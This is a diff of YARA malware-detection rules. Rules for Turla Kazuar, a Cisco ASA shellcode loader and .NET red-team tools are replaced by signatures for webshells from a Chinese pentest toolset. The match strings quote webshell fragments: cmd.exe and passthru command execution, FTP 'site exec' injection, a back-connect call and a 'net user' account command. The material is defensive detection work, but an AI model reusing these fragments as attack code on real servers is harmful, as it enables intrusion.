+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L582-L598"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6422514d25b723e7ab92c1af1301e51d9a93aa41da98791d96c4754a91b5a18e"
-		score = 75
+		hash = "4005b83ced1c032dc657283341617c410bc007b8"
+		logic_hash = "ae02d1efc975a8592a00cbab823355fb778fbb589f5752dd913aa432b316c3a4"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "860d7c237c2395b4f51b8c9bd0ee6cab06af38fff60ce3563d160d50c11d2f78"
 
 	strings:
-		$x1 = "Invoke-ProcessPunisher -Creds $RemoteCredential" fullword ascii
-		$x2 = "$Target -query \"SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')" ascii
-		$x3 = "WMImplant -Creds" fullword ascii
-		$x4 = "-Download -RemoteFile C:\\passwords.txt" ascii
-		$x5 = "-Command 'powershell.exe -command \"Enable-PSRemoting" fullword ascii
-		$x6 = "Invoke-WMImplant" fullword ascii
+		$s2 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
+		$s6 = "Response.Cookies(Cookie_Login) = sPwd" fullword ascii
+		$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_Line_Dancer
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_2_Admin_By_Lake2 : FILE
 {
 	meta:
-		description = "Targets code sections of Line Dancer, a shellcode loader targeting Cisco ASA devices."
-		author = "NCSC"
-		id = "3b49a861-8107-577a-bae1-ae28d424cc13"
-		date = "2024-04-24"
-		modified = "2024-04-29"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-dancer.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cisco_asa_line_dancer_apr24.yar#L2-L16"
+		description = "Webshell from CN Honker Pentest Toolset - file Serv-U 2 admin by lake2.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8fce8835-a4ed-58df-a725-0c1fc04becaa"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L600-L617"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "179e58274a792bc4a16787d251f5ad25de1271084323e62e153fa6d461e3c07e"
-		score = 75
+		hash = "cb8039f213e611ab2687edd23e63956c55f30578"
+		logic_hash = "a67c08b3a4bed2385d2fa8c007615bfb37a2d739cc13ee2e0f5eda00536b6ea8"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { 48 8D 5E 20 48 8D 3D BB FF FF FF BA 20 00 00 00 }
-		$ = { 4C 89 EE 44 89 F2 48 8D 3D 9A 27 00 00 }
-		$ = { 41 FF D7 41 5F 41 5E 41 5D 41 5C 5B 5D 48 C7 C0 01 00 00 00 5F }
+		$s1 = "xPost3.Open \"POST\", \"http://127.0.0.1:\"& port &\"/lake2\", True" fullword ascii
+		$s2 = "response.write \"FTP user lake  pass admin123 :)<br><BR>\"" fullword ascii
+		$s8 = "<p>Serv-U Local Get SYSTEM Shell with ASP" fullword ascii
+		$s9 = "\"-HomeDir=c:\\\\\" & vbcrlf & \"-LoginMesFile=\" & vbcrlf & \"-Disable=0\" & vb" ascii
 
 	condition:
-		all of them
+		filesize < 17KB and 2 of them
 }
-
-rule SIGNATURE_BASE_Apt_RU_Turla_Kazuar_Debugview_Pefeatures : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php3 : FILE
 {
 	meta:
-		description = "Turla mimicking SysInternals Tools- peFeatures"
-		author = "JAG-S"
-		id = "0a1675c0-8645-5288-9ef6-e68ffbfe0c3b"
-		date = "2023-12-05"
+		description = "Webshell from CN Honker Pentest Toolset - file php3.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3000ac40-35de-5d24-85fb-4d105b07c2e7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.epicturla.com/blog/sysinturla"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_kazuar.yar#L15-L59"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L619-L634"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "10c2e47e5c1885c7dc19d1fb7933c9b15911cbe4c6fba99b7f763738ae934126"
-		score = 85
+		hash = "e2924cb0537f4cdfd6f1bd44caaaf68a73419b9d"
+		logic_hash = "ba3892feacbbe3d7c6b6308a22ca22b19ae84b6490df2c976852260da2a96ca1"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		version = "2.0"
-		hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
-		hash2 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "} elseif(@is_resource($f = @popen($cfe,\"r\"))) {" fullword ascii
+		$s2 = "cf('/tmp/.bc',$back_connect);" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.version_info [ "LegalCopyright" ] == "Test Copyright" and ( ( pe.version_info [ "ProductName" ] == "Sysinternals DebugView" and pe.version_info [ "Description" ] == "Sysinternals DebugView" ) or ( pe.version_info [ "FileVersion" ] == "4.80.0.0" and pe.version_info [ "Comments" ] == "Sysinternals DebugView" ) or ( pe.version_info [ "OriginalName" ] contains "DebugView.exe" and pe.version_info [ "InternalName" ] contains "DebugView.exe" ) or ( pe.version_info [ "OriginalName" ] == "Agent.exe" and pe.version_info [ "InternalName" ] == "Agent.exe" ) ) )
+		filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_RU_Turla_Kazuar_May20_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_By_Goldsun : FILE
 {
 	meta:
-		description = "Detects Turla Kazuar malware"
+		description = "Webshell from CN Honker Pentest Toolset - file Serv-U_by_Goldsun.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd0d1fa2-5303-55f8-90a7-4a699ec79230"
-		date = "2020-05-28"
+		id = "d8b85c33-b05d-531a-9c0a-a1dddcae0da4"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.epicturla.com/blog/sysinturla"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_kazuar.yar#L61-L81"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L636-L653"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "547ed3cd88057ab91a0804ecf515eacca04fcf6e490aed1ee0f6a26c3d6b8268"
-		score = 75
+		hash = "d4d7a632af65a961a1dbd0cff80d5a5c2b397e8c"
+		logic_hash = "962b2e75c03f716fc039cf26aa238e9a3faf5a7ea8fb3d4da556fa601790055a"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
-		hash2 = "1fca5f41211c800830c5f5c3e355d31a05e4c702401a61f11e25387e25eeb7fa"
-		hash3 = "2d8151dabf891cf743e67c6f9765ee79884d024b10d265119873b0967a09b20f"
-		hash4 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Sysinternals" ascii fullword
-		$s2 = "Test Copyright" wide fullword
-		$op1 = { 0d 01 00 08 34 2e 38 30 2e 30 2e 30 00 00 13 01 }
+		$s1 = "b.open \"GET\", \"http://127.0.0.1:\" & ftpport & \"/goldsun/upadmin/s2\", True," ascii
+		$s2 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
+		$s3 = "127.0.0.1:<%=port%>," fullword ascii
+		$s4 = "GName=\"http://\" & request.servervariables(\"server_name\")&\":\"&request.serve" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_VULN_PHP_Hack_Backdoored_Zlib_Zerodium_Mar21_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php10 : FILE
 {
 	meta:
-		description = "Detects backdoored PHP zlib version"
+		description = "Webshell from CN Honker Pentest Toolset - file php10.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5e0ab8f8-776a-52b0-b5be-ff1d34bccfd1"
-		date = "2021-03-29"
+		id = "5fe78cc6-8be3-595f-a082-e361259938e5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_php_zlib_backdoor.yar#L2-L15"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L655-L670"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "74bfd9e12cb7671cde953d361a2adeb9388edd9b2aab0f9ce04dce0d433561dc"
-		score = 75
+		hash = "3698c566a0ae07234c8957112cdb34b79362b494"
+		logic_hash = "76bb2dfd518173f031cc3c93b2098edaef4aca09f0dd8228223257b0b7df452b"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "REMOVETHIS: sold to zerodium, mid 2017" fullword ascii
-		$x2 = "HTTP_USER_AGENTT" ascii fullword
+		$s1 = "dumpTable($N,$M,$Hc=false){if($_POST[\"format\"]!=\"sql\"){echo\"\\xef\\xbb\\xbf" ascii
+		$s2 = "';if(DB==\"\"||!$od){echo\"<a href='\".h(ME).\"sql='\".bold(isset($_GET[\"sql\"]" ascii
 
 	condition:
-		filesize < 3000KB and all of them
+		filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Csharpsetthreadcontext : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Servu : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "883bb859-d5ab-501d-8c83-0c5a2cf1f6c8"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/djhohnstein/CSharpSetThreadContext"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L6-L22"
+		description = "Webshell from CN Honker Pentest Toolset - file servu.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3e50d991-7297-5766-b68a-e74aa34ce042"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L671-L686"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4e1d425c7921a4b80823275d0522ad74a94b12a3b137c54faa16a57ba5d60a89"
-		score = 75
+		hash = "7de701b86820096e486e64ca34f1fa9f2fbba641"
+		logic_hash = "d3956b6daa0649233372aea4176e0d43c44d866146884222f92b7efe01f288bb"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "a1e28c8c-b3bd-44de-85b9-8aa7c18a714d" ascii wide
-		$typelibguid0up = "A1E28C8C-B3BD-44DE-85B9-8AA7C18A714D" ascii wide
-		$typelibguid1lo = "87c5970e-0c77-4182-afe2-3fe96f785ebb" ascii wide
-		$typelibguid1up = "87C5970E-0C77-4182-AFE2-3FE96F785EBB" ascii wide
+		$s0 = "fputs ($conn_id, \"SITE EXEC \".$dir.\"cmd.exe /c \".$cmd.\"\\r\\n\");" fullword ascii
+		$s1 = "function ftpcmd($ftpport,$user,$password,$dir,$cmd){" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 41KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_DLL_Injection : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Portrecall_Jsp2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "aec4fc28-9aa2-5eef-9fb1-d187a83a72b3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/ihack4falafel/DLL-Injection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L24-L38"
+		description = "Webshell from CN Honker Pentest Toolset - file jsp2.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd34cb47-c5e0-5094-a501-6a8a00d94018"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L688-L704"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e98c60d2aefb38c550a67003304196e04c42c8cb0317208cf8ffaca175ca4ba0"
-		score = 75
+		hash = "412ed15eb0d24298ba41731502018800ffc24bfc"
+		logic_hash = "1ec77a1b0d30cdebce1b5b07445247016230b733a594d8d1de642c2c8af63031"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3d7e1433-f81a-428a-934f-7cc7fcf1149d" ascii wide
-		$typelibguid0up = "3D7E1433-F81A-428A-934F-7CC7FCF1149D" ascii wide
+		$s0 = "final String remoteIP =request.getParameter(\"remoteIP\");" fullword ascii
+		$s4 = "final String localIP = request.getParameter(\"localIP\");" fullword ascii
+		$s20 = "final String localPort = \"3390\";//request.getParameter(\"localPort\");" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 23KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Limeusb_Csharp : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "dfa96b36-e84c-510b-b16b-bd686777b83d"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/LimeUSB-Csharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L40-L54"
+		description = "Webshell from CN Honker Pentest Toolset - file aspx2.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0da59fde-2214-5677-943f-05b8da4fd9d4"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L706-L723"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "10ba9197effc20894ff0812c7f1cf1a41c7b36ba89426696ca8961e10572d1d8"
-		score = 75
+		hash = "95db7a60f4a9245ffd04c4d9724c2745da55e9fd"
+		logic_hash = "7af90992bc3f708d877dcd5841c0d132793e41a0796607907084516d955b3ae0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "94ea43ab-7878-4048-a64e-2b21b3b4366d" ascii wide
-		$typelibguid0up = "94EA43AB-7878-4048-A64E-2B21B3B4366D" ascii wide
+		$s0 = "if (password.Equals(this.txtPass.Text))" fullword ascii
+		$s1 = "<head runat=\"server\">" fullword ascii
+		$s2 = ":<asp:TextBox runat=\"server\" ID=\"txtPass\" Width=\"400px\"></asp:TextBox>" fullword ascii
+		$s3 = "this.lblthispath.Text = Server.MapPath(Request.ServerVariables[\"PATH_INFO\"]);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x253c and filesize < 9KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ladon : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Hy2006A : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "57e3d2fa-d430-561b-9d42-cf58cda5ed7a"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/k8gege/Ladon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L56-L70"
+		description = "Webshell from CN Honker Pentest Toolset - file hy2006a.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "115651d3-63e1-58e3-b27c-42271111bb91"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L725-L740"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f6fdcc7795808e6612be5db336ed04039b592fce459127b4f2d6170f520b0f85"
-		score = 75
+		hash = "20da92b2075e6d96636f883dcdd3db4a38c01090"
+		logic_hash = "a24bf11a2728bb8d18ea005b057648770956694e0b257d4464ad15ee3e24eda2"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c335405f-5df2-4c7d-9b53-d65adfbed412" ascii wide
-		$typelibguid0up = "C335405F-5DF2-4C7D-9B53-D65ADFBED412" ascii wide
+		$s15 = "Const myCmdDotExeFile = \"command.com\"" fullword ascii
+		$s16 = "If LCase(appName) = \"cmd.exe\" And appArgs <> \"\" Then" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 406KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Whitelistevasion : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cd2740d0-0315-5a32-b34a-1998024fcc06"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/khr0x40sh/WhiteListEvasion"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L72-L86"
+		description = "Webshell from CN Honker Pentest Toolset - file php1.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5fe78cc6-8be3-595f-a082-e361259938e5"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L742-L758"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "39ec3d49a6fa17dca59bfee0d312c5d57a46ee0c827c01b6e25d3b107adaba04"
-		score = 75
+		hash = "c2f4b150f53c78777928921b3a985ec678bfae32"
+		logic_hash = "aadf47ac6231b41e720efdd85c481ebac8fccb572e57b86b27a95dd367c0d81b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "858386df-4656-4a1e-94b7-47f6aa555658" ascii wide
-		$typelibguid0up = "858386DF-4656-4A1E-94B7-47F6AA555658" ascii wide
+		$s7 = "$sendbuf = \"site exec \".$_POST[\"SUCommand\"].\"\\r\\n\";" fullword ascii
+		$s8 = "elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_c" ascii
+		$s18 = "echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 621KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Downloader : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Jspshell2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bfb0f97c-6d95-5e11-ad11-5297bcf7c3df"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Lime-Downloader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L88-L102"
+		description = "Webshell from CN Honker Pentest Toolset - file jspshell2.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ff72f94b-1c0a-5615-b35f-35f69c920292"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L760-L775"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51e7facdbfc47f6af8f1e7408b3817e878afddb9a1bd2fbf3fabfe97746a3964"
-		score = 75
+		hash = "cc7bc1460416663012fc93d52e2078c0a277ff79"
+		logic_hash = "3a60991fa557655fbd2450739976ac612a0ea2a3df22873382b05438cac12762"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "ec7afd4c-fbc4-47c1-99aa-6ebb05094173" ascii wide
-		$typelibguid0up = "EC7AFD4C-FBC4-47C1-99AA-6EBB05094173" ascii wide
+		$s10 = "if (cmd == null) cmd = \"cmd.exe /c set\";" fullword ascii
+		$s11 = "if (program == null) program = \"cmd.exe /c net start > \"+SHELL_DIR+\"/Log.txt" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 424KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Darkeye : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Mysql : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5dc6702f-a398-5be2-9df8-9a2ddc636a1f"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/K1ngSoul/DarkEye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L104-L118"
+		description = "Webshell from CN Honker Pentest Toolset - file mysql.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fa0627fb-a40c-5856-ae78-17d33910878f"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L777-L791"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ce1f7f9bb621ebc2bc0701084436d1932f33071483aac9c487e00ca911da4ddd"
-		score = 75
+		hash = "8e242c40aabba48687cfb135b51848af4f2d389d"
+		logic_hash = "bde2ea1ccfc88138456a1b255a32a7323f5ef0f677499db6dc6670987cc37585"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0bdb9c65-14ed-4205-ab0c-ea2151866a7f" ascii wide
-		$typelibguid0up = "0BDB9C65-14ED-4205-AB0C-EA2151866A7F" ascii wide
+		$s1 = "txtpassword.Attributes.Add(\"onkeydown\", \"SubmitKeyClick('btnLogin');\");" fullword ascii
+		$s2 = "connString = string.Format(\"Host = {0}; UserName = {1}; Password = {2}; Databas" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 202KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpkatz : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php9 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ff084b4c-4b00-5504-85ee-d6d17b5be504"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/b4rtik/SharpKatz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L120-L134"
+		description = "Webshell from CN Honker Pentest Toolset - file php9.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c8cbee10-78ea-5a6f-9c80-7e51a9c38440"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L793-L807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1e2e5be3256ad24da47096d8d7dbdaec139d4ca136a95957f505e1ec3bb3824f"
-		score = 75
+		hash = "cd3962b1dba9f1b389212e38857568b69ca76725"
+		logic_hash = "bea117862ebc9220a4d9aee091c808274f9907fceb83b528055998ddcc90aa5f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8568b4c1-2940-4f6c-bf4e-4383ef268be9" ascii wide
-		$typelibguid0up = "8568B4C1-2940-4F6C-BF4E-4383EF268BE9" ascii wide
+		$s1 = "Str[17] = \"select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r ab" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1087KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Externalc2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Portrecall_Jsp : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1bbdfbb9-a3e8-5ffe-9db9-b50937e6a14d"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/ryhanson/ExternalC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L136-L152"
+		description = "Webshell from CN Honker Pentest Toolset - file jsp.txt"
